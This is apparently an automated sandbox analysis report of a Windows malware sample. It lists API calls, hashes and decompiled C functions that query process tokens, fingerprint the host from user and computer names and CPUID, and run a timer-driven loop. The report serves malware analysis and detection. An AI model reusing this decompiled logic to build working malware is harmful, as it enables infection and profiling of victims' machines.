                                • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,053C92FC,?,04611B37,004F0053,053C92FC,?,?,?,?,?,?,046120B0), ref: 04615D47
                                • lstrlenW.KERNEL32(04611B37,?,04611B37,004F0053,053C92FC,?,?,?,?,?,?,046120B0), ref: 04615D4E
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04611B37,004F0053,053C92FC,?,?,?,?,?,?,046120B0), ref: 04615D6E
                                • memcpy.NTDLL(751469A0,04611B37,00000002,00000000,004F0053,751469A0,?,?,04611B37,004F0053,053C92FC), ref: 04615D81
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: 2b9ce588603981112eeb5cffa8d6ba7a35c65d5b515d1bbdc8e6e738f2c8557d
                                • Instruction ID: 43abee99aebdf6c630b7472fc7995b43de38f7579f2fdf40d50b25ff9ee62aa2
                                • Opcode Fuzzy Hash: 2b9ce588603981112eeb5cffa8d6ba7a35c65d5b515d1bbdc8e6e738f2c8557d
                                • Instruction Fuzzy Hash: 8CF04976900118BBCF10EFA8CC84CDE7BACEF082987094066F908D7211F775EA14DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(053C87FA,00000000,00000000,00000000,04617100,00000000), ref: 046121D1
                                • lstrlen.KERNEL32(?), ref: 046121D9
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • lstrcpy.KERNEL32(00000000,053C87FA), ref: 046121ED
                                • lstrcat.KERNEL32(00000000,?), ref: 046121F8
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: e67d69820802fca6e57144dd7ab894177bb0b5cbeea451b8d1e0a64503b377d8
                                • Instruction ID: 21416b5107dde46f4e71a165859a56571c5b5dede87ba7d75101a031478f3d31
                                • Opcode Fuzzy Hash: e67d69820802fca6e57144dd7ab894177bb0b5cbeea451b8d1e0a64503b377d8
                                • Instruction Fuzzy Hash: C5E012B39012656787119BE49C58CAFBBADEF9975230D045BFA00D3120E728DD09DBE5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                C-Code - Quality: 38%
                                			E04812D06(char _a4, void* _a8) {
                                				void* _v8;
                                				void* _v12;
                                				char _v16;
                                				void* _v20;
                                				char _v24;
                                				char _v28;
                                				char _v32;
                                				char _v36;
                                				char _v40;
                                				void* _v44;
                                				void** _t33;
                                				void* _t40;
                                				void* _t43;
                                				void** _t44;
                                				intOrPtr* _t47;
                                				char _t48;
                                
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v20 = _a4;
                                				_t48 = 0;
                                				_v16 = 0;
                                				_a4 = 0;
                                				_v44 = 0x18;
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v36 = 0;
                                				_v28 = 0;
                                				_v24 = 0;
                                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                					_t33 =  &_v8;
                                					__imp__(_v12, 8, _t33);
                                					if(_t33 >= 0) {
                                						_t47 = __imp__;
                                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                						_t44 = E04816837(_a4);
                                						if(_t44 != 0) {
                                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                							if(_t40 >= 0) {
                                								memcpy(_a8,  *_t44, 0x1c);
                                								_t48 = 1;
                                							}
                                							E048150CA(_t44);
                                						}
                                						NtClose(_v8); // executed
                                					}
                                					NtClose(_v12);
                                				}
                                				return _t48;
                                			}




















                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04812D4D
                                • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 04812D60
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04812D7C
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04812D99
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04812DA6
                                • NtClose.NTDLL(00000000), ref: 04812DB8
                                • NtClose.NTDLL(00000000), ref: 04812DC2
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 7f81f0fe24d783f68b3452443087fc4e5a44ae86f90dfe2fb9bc82d5a99838f1
                                • Instruction ID: 3b2f5d31eff9542dc6e4349a2701c7a3086ddeb64ac7aa16d976dfc9401d9763
                                • Opcode Fuzzy Hash: 7f81f0fe24d783f68b3452443087fc4e5a44ae86f90dfe2fb9bc82d5a99838f1
                                • Instruction Fuzzy Hash: F321F4B2900218BBDB01AF94CC459DEBFBDEF08750F1045A6F904E6160E7B59A80DBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 83%
                                			E04812022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                				struct %anon52 _v8;
                                				long _v12;
                                				char _v16;
                                				char _v20;
                                				signed int _v24;
                                				intOrPtr _v32;
                                				union _LARGE_INTEGER _v36;
                                				intOrPtr _v40;
                                				void* _v44;
                                				void _v88;
                                				char _v92;
                                				struct %anon52 _t46;
                                				intOrPtr _t51;
                                				long _t53;
                                				void* _t54;
                                				struct %anon52 _t61;
                                				long _t65;
                                				signed int _t66;
                                				void* _t69;
                                				void* _t71;
                                				signed int _t72;
                                				intOrPtr _t74;
                                				intOrPtr _t76;
                                				void** _t78;
                                				void* _t80;
                                
                                				_t74 = __edx;
                                				_v92 = 0;
                                				memset( &_v88, 0, 0x2c);
                                				_t46 = CreateWaitableTimerA(0, 1, 0);
                                				_v44 = _t46;
                                				if(_t46 == 0) {
                                					_v8.LowPart = GetLastError();
                                				} else {
                                					_push(0xffffffff);
                                					_push(0xff676980);
                                					_push(0);
                                					_push( *0x481a298);
                                					_v20 = 0;
                                					_v16 = 0;
                                					L04817D8C();
                                					_v36.LowPart = _t46;
                                					_v32 = _t74;
                                					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                					_t51 =  *0x481a2c4; // 0x34c
                                					_v40 = _t51;
                                					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                					_v8.LowPart = _t53;
                                					if(_t53 == 0) {
                                						if(_a8 != 0) {
                                							L4:
                                							 *0x481a2a4 = 5;
                                						} else {
                                							_t69 = E04811AB8(_t74); // executed
                                							if(_t69 != 0) {
                                								goto L4;
                                							}
                                						}
                                						_v12 = 0;
                                						L6:
                                						L6:
                                						if(_v12 == 1 && ( *0x481a2b8 & 0x00000001) == 0) {
                                							_v12 = 2;
                                						}
                                						_t72 = _v12;
                                						_t58 = _t72 << 4;
                                						_t76 = _t80 + (_t72 << 4) - 0x54;
                                						_t73 = _t72 + 1;
                                						_v24 = _t72 + 1;
                                						_t61 = E04815F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
                                						_v8.LowPart = _t61;
                                						if(_t61 != 0) {
                                							goto L17;
                                						}
                                						_t66 = _v24;
                                						_t90 = _t66 - 3;
                                						_v12 = _t66;
                                						if(_t66 != 3) {
                                							goto L6;
                                						} else {
                                							_v8.LowPart = E04813032(_t73, _t90,  &_v92, _a4, _a8);
                                						}
                                						goto L12;
                                						L17:
                                						__eflags = _t61 - 0x10d2;
                                						if(_t61 != 0x10d2) {
                                							_push(0xffffffff);
                                							_push(0xff676980);
                                							_push(0);
                                							_push( *0x481a29c);
                                							goto L21;
                                						} else {
                                							__eflags =  *0x481a2a0; // 0xa
                                							if(__eflags == 0) {
                                								goto L12;
                                							} else {
                                								_t61 = E04811492();
                                								_push(0xffffffff);
                                								_push(0xdc3cba00);
                                								_push(0);
                                								_push( *0x481a2a0);
                                								L21:
                                								L04817D8C();
                                								_v36.LowPart = _t61;
                                								_v32 = _t76;
                                								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                								__eflags = _t65;
                                								_v8.LowPart = _t65;
                                								if(_t65 == 0) {
                                									goto L6;
                                								} else {
                                									goto L12;
                                								}
                                							}
                                						}
                                						L25:
                                					}
                                					L12:
                                					_t78 =  &_v92;
                                					_t71 = 3;
                                					do {
                                						_t54 =  *_t78;
                                						if(_t54 != 0) {
                                							HeapFree( *0x481a290, 0, _t54);
                                						}
                                						_t78 =  &(_t78[4]);
                                						_t71 = _t71 - 1;
                                					} while (_t71 != 0);
                                					CloseHandle(_v44);
                                				}
                                				return _v8;
                                				goto L25;
                                			}

                                APIs
                                • memset.NTDLL ref: 04812037
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04812043
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04812068
                                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04812084
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0481209D
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04812132
                                • CloseHandle.KERNEL32(?), ref: 04812141
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0481217B
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,0481560C), ref: 04812191
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0481219C
                                  • Part of subcall function 04811AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,068D9340,?,00000000,30314549,00000014,004F0053,068D92FC), ref: 04811BA4
                                  • Part of subcall function 04811AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,048120B0), ref: 04811BB6
                                • GetLastError.KERNEL32 ref: 048121AE
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID:
                                • API String ID: 3521023985-0
                                • Opcode ID: 641d9fc351fa46b4f6d6dfa328ff696cd9fc6e4ae81a54b0bbe0e9f99d866672
                                • Instruction ID: 46aff667004e2188da68488a7c1dd27006ed5d6fecac74efd5ed264e3d4be92c
                                • Opcode Fuzzy Hash: 641d9fc351fa46b4f6d6dfa328ff696cd9fc6e4ae81a54b0bbe0e9f99d866672
                                • Instruction Fuzzy Hash: 5F5149B1901228AEDF11EF95DC449EEBFBDEF08724F204A57E514F21A0D775AA40CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 74%
                                			E04816384(intOrPtr __edx, void** _a4, void** _a8) {
                                				intOrPtr _v8;
                                				struct _FILETIME* _v12;
                                				short _v56;
                                				struct _FILETIME* _t12;
                                				intOrPtr _t13;
                                				void* _t17;
                                				void* _t21;
                                				intOrPtr _t27;
                                				long _t28;
                                				void* _t30;
                                
                                				_t27 = __edx;
                                				_t12 =  &_v12;
                                				GetSystemTimeAsFileTime(_t12);
                                				_push(0x192);
                                				_push(0x54d38000);
                                				_push(_v8);
                                				_push(_v12);
                                				L04817D86();
                                				_push(_t12);
                                				_v12 = _t12;
                                				_t13 =  *0x481a2d4; // 0x20bd5a8
                                				_t5 = _t13 + 0x481b8a2; // 0x68d8e4a
                                				_t6 = _t13 + 0x481b57c; // 0x530025
                                				_push(0x16);
                                				_push( &_v56);
                                				_v8 = _t27;
                                				L04817A6A();
                                				_t17 = CreateFileMappingW(0xffffffff, 0x481a2f8, 4, 0, 0x1000,  &_v56); // executed
                                				_t30 = _t17;
                                				if(_t30 == 0) {
                                					_t28 = GetLastError();
                                				} else {
                                					if(GetLastError() == 0xb7) {
                                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                						if(_t21 == 0) {
                                							_t28 = GetLastError();
                                							if(_t28 != 0) {
                                								goto L6;
                                							}
                                						} else {
                                							 *_a4 = _t30;
                                							 *_a8 = _t21;
                                							_t28 = 0;
                                						}
                                					} else {
                                						_t28 = 2;
                                						L6:
                                						CloseHandle(_t30);
                                					}
                                				}
                                				return _t28;
                                			}

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,04815488,?,00000001,?), ref: 04816390
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 048163A6
                                • _snwprintf.NTDLL ref: 048163CB
                                • CreateFileMappingW.KERNELBASE(000000FF,0481A2F8,00000004,00000000,00001000,?), ref: 048163E7
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04815488,?), ref: 048163F9
                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04816410
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04815488), ref: 04816431
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04815488,?), ref: 04816439
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: e8d6c701158c89015debf0ba868bdb38657ae10730e67aad51cd9cd01864e33f
                                • Instruction ID: 12189efb1979b933d673b6194c17b1020b721336fbd69cd58bd366ebf66da657
                                • Opcode Fuzzy Hash: e8d6c701158c89015debf0ba868bdb38657ae10730e67aad51cd9cd01864e33f
                                • Instruction Fuzzy Hash: DC21C3B2B00228BBD711AB68DC05F9D77ADEF44750F204A27F905F71A0EA70AA01CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 96%
                                			E04814454(char __eax, signed int* __esi) {
                                				long _v8;
                                				char _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v28;
                                				long _t34;
                                				signed int _t39;
                                				long _t50;
                                				char _t59;
                                				intOrPtr _t61;
                                				void* _t62;
                                				void* _t63;
                                				signed int* _t64;
                                				char _t65;
                                				intOrPtr* _t67;
                                				void* _t68;
                                				signed int* _t69;
                                
                                				_t69 = __esi;
                                				_t65 = __eax;
                                				_v8 = 0;
                                				_v12 = __eax;
                                				if(__eax == 0) {
                                					_t59 =  *0x481a2c8; // 0xbd092303
                                					_v12 = _t59;
                                				}
                                				_t64 = _t69;
                                				E0481143F( &_v12, _t64);
                                				if(_t65 != 0) {
                                					 *_t69 =  *_t69 ^  *0x481a2d0 ^ 0x4c0ca0ae;
                                				} else {
                                					GetUserNameW(0,  &_v8); // executed
                                					_t50 = _v8;
                                					if(_t50 != 0) {
                                						_t62 = RtlAllocateHeap( *0x481a290, 0, _t50 + _t50);
                                						if(_t62 != 0) {
                                							if(GetUserNameW(_t62,  &_v8) != 0) {
                                								_t63 = _t62;
                                								 *_t69 =  *_t69 ^ E0481283A(_v8 + _v8, _t63);
                                							}
                                							HeapFree( *0x481a290, 0, _t62);
                                						}
                                					}
                                				}
                                				_t61 = __imp__;
                                				_v8 = _v8 & 0x00000000;
                                				GetComputerNameW(0,  &_v8);
                                				_t34 = _v8;
                                				if(_t34 != 0) {
                                					_t68 = RtlAllocateHeap( *0x481a290, 0, _t34 + _t34);
                                					if(_t68 != 0) {
                                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                							_t63 = _t68;
                                							_t69[3] = _t69[3] ^ E0481283A(_v8 + _v8, _t63);
                                						}
                                						HeapFree( *0x481a290, 0, _t68);
                                					}
                                				}
                                				asm("cpuid");
                                				_t67 =  &_v28;
                                				 *_t67 = 1;
                                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                				 *(_t67 + 8) = _t63;
                                				 *(_t67 + 0xc) = _t64;
                                				_t39 = _v16 ^ _v20 ^ _v28;
                                				_t69[1] = _t69[1] ^ _t39;
                                				return _t39;
                                			}

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,048155CE), ref: 0481448B
                                • RtlAllocateHeap.NTDLL(00000000,048155CE), ref: 048144A2
                                • GetUserNameW.ADVAPI32(00000000,048155CE), ref: 048144AF
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,048155CE,?,?,?,?,?,04816BD8,?,00000001), ref: 048144D0
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 048144F7
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0481450B
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04814518
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04814536
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID:
                                • API String ID: 3239747167-0
                                • Opcode ID: cf44d9fe943e03895782e63d5e48a101b6aff64fe7aaa4c109878aaf764c90eb
                                • Instruction ID: cb48eaa7971395fc03bafb309868f27d03f533a91ccd0a2c3e8a19ca12208216
                                • Opcode Fuzzy Hash: cf44d9fe943e03895782e63d5e48a101b6aff64fe7aaa4c109878aaf764c90eb
                                • Instruction Fuzzy Hash: 08311BB1A01209EFDB11DFA9D880AAEB7FDFB48714F11496AE545E3220D779EE40DB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E048153F2(signed int __edx) {
                                				signed int _v8;
                                				long _v12;
                                				signed int _v16;
                                				long _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				intOrPtr _v32;
                                				intOrPtr _v36;
                                				char _v40;
                                				void* __edi;
                                				void* __esi;
                                				void* _t27;
                                				long _t28;
                                				long _t31;
                                				intOrPtr _t32;
                                				void* _t36;
                                				signed int _t37;
                                				intOrPtr _t38;
                                				void* _t39;
                                				CHAR* _t42;
                                				long _t48;
                                				long _t49;
                                				void* _t54;
                                				void* _t56;
                                				intOrPtr _t64;
                                				void* _t67;
                                				long _t71;
                                				void* _t72;
                                				signed char _t74;
                                				intOrPtr _t76;
                                				signed int _t77;
                                				long _t82;
                                				long _t84;
                                				CHAR* _t87;
                                				void* _t88;
                                
                                				_t79 = __edx;
                                				_v16 = 0;
                                				_v8 = 0;
                                				_v12 = 0;
                                				_t27 = E048158F8();
                                				if(_t27 != 0) {
                                					_t77 =  *0x481a2b4; // 0x4000000a
                                					_t73 = (_t77 & 0xf0000000) + _t27;
                                					 *0x481a2b4 = (_t77 & 0xf0000000) + _t27;
                                				}
                                				_t28 =  *0x481a148(0, 2);
                                				_v20 = _t28;
                                				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                                					_t31 = E0481696F( &_v8,  &_v16); // executed
                                					_push(0);
                                					_t84 = _t31;
                                					_t32 =  *0x481a2d4; // 0x20bd5a8
                                					_push(0x481a2fc);
                                					_push(1);
                                					_t7 = _t32 + 0x481b5ad; // 0x4d283a53
                                					 *0x481a2f8 = 0xc;
                                					 *0x481a300 = 0;
                                					L04814AF8();
                                					_t36 = E04816384(_t79,  &_v24,  &_v12); // executed
                                					if(_t36 == 0) {
                                						CloseHandle(_v24);
                                					}
                                					if(_t84 != 5) {
                                						_t37 = _v16;
                                						__eflags = _t37;
                                						if(_t37 != 0) {
                                							E04814454(_t37 ^ 0xe8fa7dd7,  &_v40);
                                							_t87 = E04816837(0x27);
                                							__eflags = _t87;
                                							if(_t87 != 0) {
                                								asm("bswap eax");
                                								asm("bswap eax");
                                								asm("bswap eax");
                                								asm("bswap eax");
                                								_t64 =  *0x481a2d4; // 0x20bd5a8
                                								_t18 = _t64 + 0x481b84f; // 0x78383025
                                								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
                                								_t88 = _t88 + 0x18;
                                							}
                                							 *0x481a32c = _t87;
                                						}
                                						_t38 = E048160E1();
                                						 *0x481a2c8 =  *0x481a2c8 ^ 0xe8fa7dd7;
                                						 *0x481a31c = _t38;
                                						_t39 = E04816837(0x60);
                                						__eflags = _t39;
                                						 *0x481a37c = _t39;
                                						if(_t39 == 0) {
                                							_t84 = 8;
                                						} else {
                                							memset(_t39, 0, 0x60);
                                							_t54 =  *0x481a37c; // 0x68d9630
                                							_t88 = _t88 + 0xc;
                                							__imp__(_t54 + 0x40);
                                							_t56 =  *0x481a37c; // 0x68d9630
                                							 *_t56 = 0x481b83e;
                                							_t84 = 0;
                                						}
                                						__eflags = _t84;
                                						if(_t84 == 0) {
                                							_t42 = RtlAllocateHeap( *0x481a290, _t84, 0x43);
                                							__eflags = _t42;
                                							 *0x481a314 = _t42;
                                							if(_t42 == 0) {
                                								_t84 = 8;
                                							} else {
                                								_t74 =  *0x481a2b4; // 0x4000000a
                                								_t79 = _t74 & 0x000000ff;
                                								_t76 =  *0x481a2d4; // 0x20bd5a8
                                								_t19 = _t76 + 0x481b53a; // 0x697a6f4d
                                								_t73 = _t19;
                                								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x48192a7);
                                							}
                                							__eflags = _t84;
                                							if(_t84 == 0) {
                                								asm("sbb eax, eax");
                                								E04814454( ~_v8 &  *0x481a2c8, 0x481a00c); // executed
                                								_t84 = E04812206(_t73);
                                								__eflags = _t84;
                                								if(_t84 != 0) {
                                									goto L31;
                                								}
                                								_t48 = E04811376();
                                								__eflags = _t48;
                                								if(_t48 != 0) {
                                									__eflags = _v8;
                                									_t82 = _v12;
                                									if(_v8 != 0) {
                                										L30:
                                										_t49 = E04812022(_t79, _t82, _v8); // executed
                                										_t84 = _t49;
                                										goto L31;
                                									}
                                									__eflags = _t82;
                                									if(__eflags == 0) {
                                										goto L31;
                                									}
                                									_t23 = _t82 + 4; // 0x5
                                									_t84 = E04812439(__eflags, _t23);
                                									__eflags = _t84;
                                									if(_t84 == 0) {
                                										goto L31;
                                									}
                                									goto L30;
                                								}
                                								_t84 = 8;
                                							}
                                						}
                                					} else {
                                						_t71 = _v12;
                                						if(_t71 == 0) {
                                							L31:
                                							if(_v20 == 0 || _v20 == 1) {
                                								 *0x481a14c();
                                							}
                                							goto L35;
                                						}
                                						_t72 = _t71 + 4;
                                						do {
                                							_push(1);
                                							_push(_t72);
                                							_t67 = 5;
                                						} while (E04816BE1(_t67, 0) == 0x4c7);
                                					}
                                					goto L31;
                                				} else {
                                					_t84 = _t28;
                                					L35:
                                					return _t84;
                                				}
                                			}

                                APIs
                                  • Part of subcall function 048158F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,0481540B,00000000,00000000,00000000,?,?,?,?,?,04816BD8,?,00000001), ref: 04815907
                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0481A2FC,00000000), ref: 04815476
                                • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,04816BD8,?,00000001), ref: 0481548F
                                • wsprintfA.USER32 ref: 0481550F
                                • memset.NTDLL ref: 0481553F
                                • RtlInitializeCriticalSection.NTDLL(068D95F0), ref: 04815550
                                • RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 04815579
                                • wsprintfA.USER32 ref: 048155A9
                                  • Part of subcall function 04814454: GetUserNameW.ADVAPI32(00000000,048155CE), ref: 0481448B
                                  • Part of subcall function 04814454: RtlAllocateHeap.NTDLL(00000000,048155CE), ref: 048144A2
                                  • Part of subcall function 04814454: GetUserNameW.ADVAPI32(00000000,048155CE), ref: 048144AF
                                  • Part of subcall function 04814454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,048155CE,?,?,?,?,?,04816BD8,?,00000001), ref: 048144D0
                                  • Part of subcall function 04814454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 048144F7
                                  • Part of subcall function 04814454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0481450B
                                  • Part of subcall function 04814454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 04814518
                                  • Part of subcall function 04814454: HeapFree.KERNEL32(00000000,00000000), ref: 04814536
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                • String ID:
                                • API String ID: 2910951584-0
                                • Opcode ID: a5e67300b6f517991a3499b7b6cc566a469e947dee4a0f625af4f5dfce9cf64a
                                • Instruction ID: 7cf53a55d3599b5f67e03f5e261b1aa11ad6632eaebd0ff3fb8759a252148e97
                                • Opcode Fuzzy Hash: a5e67300b6f517991a3499b7b6cc566a469e947dee4a0f625af4f5dfce9cf64a
                                • Instruction Fuzzy Hash: B851C4B1A01225AFEB15DBA8D844BAE73ACEB84754F100E17E905E7170D7B8FD408B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0481113D(long* _a4) {
                                				long _v8;
                                				void* _v12;
                                				void _v16;
                                				long _v20;
                                				int _t33;
                                				void* _t46;
                                
                                				_v16 = 1;
                                				_v20 = 0x2000;
                                				if( *0x481a2b4 > 5) {
                                					_v16 = 0;
                                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                						_v8 = 0;
                                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                						if(_v8 != 0) {
                                							_t46 = E04816837(_v8);
                                							if(_t46 != 0) {
                                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                								if(_t33 != 0) {
                                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                								}
                                								E048150CA(_t46);
                                							}
                                						}
                                						CloseHandle(_v12);
                                					}
                                				}
                                				 *_a4 = _v20;
                                				return _v16;
                                			}

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 0481116F
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 0481118F
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0481119F
                                • CloseHandle.KERNEL32(00000000), ref: 048111EF
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 048111C2
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 048111CA
